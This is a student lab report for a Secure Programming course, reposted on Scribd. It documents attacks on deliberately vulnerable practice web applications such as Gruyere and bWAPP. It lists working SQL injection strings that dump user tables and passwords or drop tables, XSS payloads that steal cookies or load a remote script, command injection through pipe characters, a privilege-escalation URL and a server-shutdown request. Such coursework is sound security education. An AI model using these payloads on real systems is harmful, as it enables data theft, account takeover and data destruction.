Scribd
Upload
86 views62 pages

T&H Andreea Iuga 2705400

This document discusses various techniques for secure programming and vulnerabilities in web applications. It covers SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), path traversal, and command execution vulnerabilities at different security levels. It also demonstrates how these vulnerabilities can be exploited on the Gruyere and bWAPP vulnerable web applications. Specific techniques shown include retrieving data from databases, executing commands, elevating privileges, and denial of service attacks. The document provides a guide to common web application vulnerabilities and methods for exploiting them.

Uploaded by

iuga
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
86 views62 pages

T&H Andreea Iuga 2705400

This document discusses various techniques for secure programming and vulnerabilities in web applications. It covers SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), path traversal, and command execution vulnerabilities at different security levels. It also demonstrates how these vulnerabilities can be exploited on the Gruyere and bWAPP vulnerable web applications. Specific techniques shown include retrieving data from databases, executing commands, elevating privileges, and denial of service attacks. The document provides a guide to common web application vulnerabilities and methods for exploiting them.

Uploaded by

iuga
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 62

Secure

Programming

Authors:
Andreea Iuga (2705400)
Gintare Narbutaite (2521881)

19/Sept/2018
Table of contents

Part 1: SQL injection 4


Q&A 4
SQL injection: Security level: low 5
SQL injection: Security level: medium 11
Part 2: XSS, XSRF, Path Traversal (PT) 13
XSS reflected 13
XSS reflected: Security level: low 13
XSS reflected: Security level: medium 17
XSS stored 19
XSS stored: Security level: low 19
XSS stored: Security level: medium 23
CSRF 27
CSRF: Security level: low 27
CSRF: Security level: medium 28
Command execution 29
CSRF: Security level: low 29
CSRF: Security level: medium 32
Gruyere 35
Gruyere: File upload XSS 35
Gruyere: Reflected XSS 37
Gruyere: Stored XSS 38
Gruyere: Stored XSS via HTML Attribute 39
Gruyere: Stored XSS via AJAX 40
Gruyere: Elevation of Privilege 41
41
Gruyere: Cookie manipulation 42
Gruyere: XSSI 43
43
Gruyere: Path traversal (data tampering) 44
Gruyere: DoS - Quit the Server 44
EXTRA: Hacking bWAPP 45
SQL Injection 48
SQL Injection - Get/Search 48
HTML Injection 54
iFrame Injection 57
SSI Injection 58
Personal development 62
Part 1: SQL injection

Q&A
Test for SQL injection: What input is used in queries? What input is vulnerable
to SQLi?
Unsanitized input, meaning that you do not strip for bad characters. The SQL
injection usually happens in the where clause.

Can you generate errors with erroneous input and learn more about the
database back-end?
Yes, it is possible. Based on the database vendor you can use different commands to
print system info or dump valuable information if the web app is vulnerable to SQL
injection.

Can you list all users in database with SQL injection?


It is possible to list all currently existing users in the database by the help of SQL
injection. Moreover, by executing another command it is even possible to see the
passwords of those users.

What can you learn about the db structure with blindfolded sqli techniques?
It means that you do not know where vulnerability is, so you have to try different
combinations until your guess is true and then you retrieve e.g. username and
password.

Can you list data from other table with SQL injection?
SQL injection: Security level: low

Display users in the database by inserting: %’or’0’=’0


The other command: ‘or’a’=’a gives the same output as the previous one:

These commands return currently existing users within user table.


DROP the table: by 1;DROP TABLE users
Retrieving the version of the database by inserting command: %' or 0=0 union select null,
version()#
Getting the information about the database schema with the command:
1’ OR 1=1 UNION SELECT NULL, TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES#

The result looked like this:


Retrieving the passwords of the current users, which are stored in the database by using the
following command:
1’ OR 1=1 UNION SELECT user, password from users#
SQL injection: Security level: medium

1’ OR 1=1 UNION SELECT user, password from users#

The output of the command was the following:


Getting the information of the database schema with the command:
1’ OR 1=1 UNION SELECT NULL, TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES#

The output was again the error message:


Part 2: XSS, XSRF, Path Traversal (PT)

XSS reflected

XSS reflected: Security level: low

1.
What’s your name?: <script>alert("Hackers Techniques")</script>
2.
What’s your name?: <h1>TEST</h1>
3.
What’s your name?: <A HREF="//www.google.com/">XSS </A>

4.
What’s your name?: <h1 style="background-color:DodgerBlue;">Hello
World</h1>
5.
What’s your name?: <img
src=”https://www.trafalgar.com/~/media/images/home/destinations/europe-and-
britain/netherlands/2016-licensed-images/netherlands-rotterdam-2016-r-
531510513.jpg?la=en&h=450&w=450&mw=450”>

6.
What’s your name?: <script>alert(document.cookie)</script>
XSS reflected: Security level: medium
1.
What’s your name?: <script>alert("Hackers Techniques")</script>

2.
What’s your name?: <h1>TEST</h1>
3.
What’s your name?: <img
src=”https://www.trafalgar.com/~/media/images/home/destinations/europe-and-
britain/netherlands/2016-licensed-images/netherlands-rotterdam-2016-r-
531510513.jpg?la=en&h=450&w=450&mw=450”>

4.
What’s your name?: <script>alert(document.cookie)</script>
XSS stored

XSS stored: Security level: low


1.
Name: SeprTest
Message: <h1>TEST</h1>
2.

Name: SeprTest
Message: <script>alert("Hacking techniques");</script>
3.

Name: SeprTEST
Message: <IFRAME SRC=javascript:alert('XSS')></IFRAME>
4.

Name: SeprTEST
Message: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
XSS stored: Security level: medium

1.
Name: SeprTest
Message: <h1>TEST</h1>
2.

Name: SeprTest
Message: <script>alert("Hacking techniques");</script>
3.

Name: SeprTEST
Message: <IFRAME SRC=javascript:alert('XSS')></IFRAME>
4.

Name: SeprTEST
Message: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
CSRF

CSRF: Security level: low


1.
New password: sepr08
Confirm new password: sepr08

2.
New password: sepr08
Confirm new password: password
CSRF: Security level: medium
1.
New password: sepr08
Confirm new password: sepr08

2.
New password: sepr08
Confirm new password: password
Command execution

CSRF: Security level: low


1.
Enter an IP address below: 192.168.20.26

2.
Enter an IP address below: 8.8.8.8
3.
Enter an IP address below: | date

4.
Enter an IP address below: | whoami

5.
Enter an IP address below: | netstat

6.
Enter an IP address below: | vmstat
CSRF: Security level: medium
1.
Enter an IP address below: 192.168.20.26

2.
Enter an IP address below: 8.8.8.8
3.
Enter an IP address below: | date

4.
Enter an IP address below: | whoami
5.
Enter an IP address below: | netstat

6.
Enter an IP address below: | vmstat
Gruyere
Step 1: create a fake account
Username: andreea
Password: password

Gruyere: File upload XSS


1.
In order to start the XSS attack, we’ll upload a html file on gruyere
We can access the file at the above mentioned link, therefore we reach the following page

After pressing the ‘ok’ button, we’ll be redirected to the intended page:

2. In order to start the XSS attack, we’ll upload a html file on gruyere
We can access the file at the above mentioned link, therefore we reach the following page

After pressing the ‘ok’ button, we’ll be redirected to the intended page:

Gruyere: Reflected XSS

Create an URL: https://google-


gruyere.appspot.com/518663309805883930959424785217645150920/<script>ale
rt(document.cookie)</script>

Therefore, the attack was successful.


Gruyere: Stored XSS
Insert “<a onmouseover="alert(1)" href="#">read this!</a>” in the html file:
Gruyere: Stored XSS via HTML Attribute

When the user is with the mouse over the title, he/she gets the following mesage:
Gruyere: Stored XSS via AJAX
Fake account: ginte, password

After submitting entered text, we should expect some changes on client side, which to be
more specific, inserts the snippet into the document. However, what we see is:

Instead of JSON.
Gruyere: Elevation of Privilege

Converting simple account into administrator by issuing the following request:


https://google-
gruyere.appspot.com/432592005498204268630965285797940329505/saveprofile?actio
n=update&is_admin=True
Gruyere: Cookie manipulation
Creating new account with username: admin, Gruyere issues a cookie from someone’s else
account.

Bypassing the restriction of having only sixteen characters in the user name:
by issuing the following request:
https://google-
gruyere.appspot.com/432592005498204268630965285797940329505/saveprofile?act
ion=new&uid=administrator|admin|author&pw=secret
Gruyere: XSSI

Reading someone’s else's private snippet by executing feed.gtl script. When the script is
being executed, _feed function can do whatever it wants with the data, including sending it to
another web as well.
Gruyere: Path traversal (data tampering)

Creating a text file called secret.txt


Uploading the file onto Gruyere server. This way the Gruyere file called secret.txt will be
replaced by the one, I have recently uploaded.

Gruyere: DoS - Quit the Server

In order to quit the server, you should be logged in as administrator. However, by issuing a
request to:
https://google-
gruyere.appspot.com/432592005498204268630965285797940329505/quitserver
We can be logged in as a simple user.
EXTRA: Hacking bWAPP
bWAPP, or a buggy web application, is a free and open source deliberately insecure web
application.

bWAPP helps security enthusiasts, developers and students to discover and to prevent web
vulnerabilities. bWAPP prepares one to conduct successful penetration testing and ethical
hacking projects. What makes bWAPP so unique? Well, it has over 100 web bugs! It covers
all major known web vulnerabilities, including all risks from the OWASP Top 10 project. The
focus is not just on one specific issue... bWAPP is covering a wide range of vulnerabilities!

bWAPP is a PHP application that uses a MySQL database. It can be hosted on


Linux/Windows with Apache/IIS and MySQL. It is supported on WAMP or XAMPP. Another
possibility is to download bee-box, a custom VM pre-installed with bWAPP.
SQL Injection

SQL Injection - Get/Search


1.
Now, we’ll try to search for “Iron Man”
2.
Command used: title=1’ order by 1-- -

3.
Command used: title=1’ order by 5-- -
4.
Command used: title=1’ order by 7-- -

The result of this command is that the column is out of table

5.
Command: title=1’ union select 1,2,3,4,5,6-- -
6.
Command: title=1’ union select 1,2,3,4,database(),6-- -

7.
Command: title=1’ union select 1,2,3,4,version(),6-- -
8.
Command: title=1’ union select 1,2,3,4,table_name(),6 from information_schema.tables -- -
9.
Command: title=1’ union select 1,2,3,4,table_name,6 from information_schema.tables where
table_schema=database-- -

10.
Command: title=1’ union select 1,2,3,4,group_concat(table_name),6 from
information_schema.tables where table_schema=database-- -
HTML Injection

Description
HTML Injection - Reflected GET
First name: <h1>HTML</h1>
Last name: <h1> injection </h1>
HTML Injection - Reflected POST
First name: <h1>HTML</h1>
Last name: <h1> post</h1>
iFrame Injection

By changing the width into 50 and height into 50, we’ll get the following result:
SSI Injection

Description
Command:
First name: Test
Last name: Test2

Result:
Command:
First name: <script> alert(“xss”)</script>
Last name: Test1

Result:
Command:
First name: <!--#echo var=”DOCUMENT_NAME”-->
Last name: Test3

Result:
Personal development
By doing the research and applying it, we have gained new skills and enlarged our
knowledge about hacking techniques and how it could be applied to vulnerable websites and
web-services. In addition, we got some information about possible preventions of those
techniques.
Obtained knowledge contains a lot of different hacking possibilities. During the second part
of Secure Programming course, we hope to be able to successfully apply this knowledge,
when practicing of website hacking.

You might also like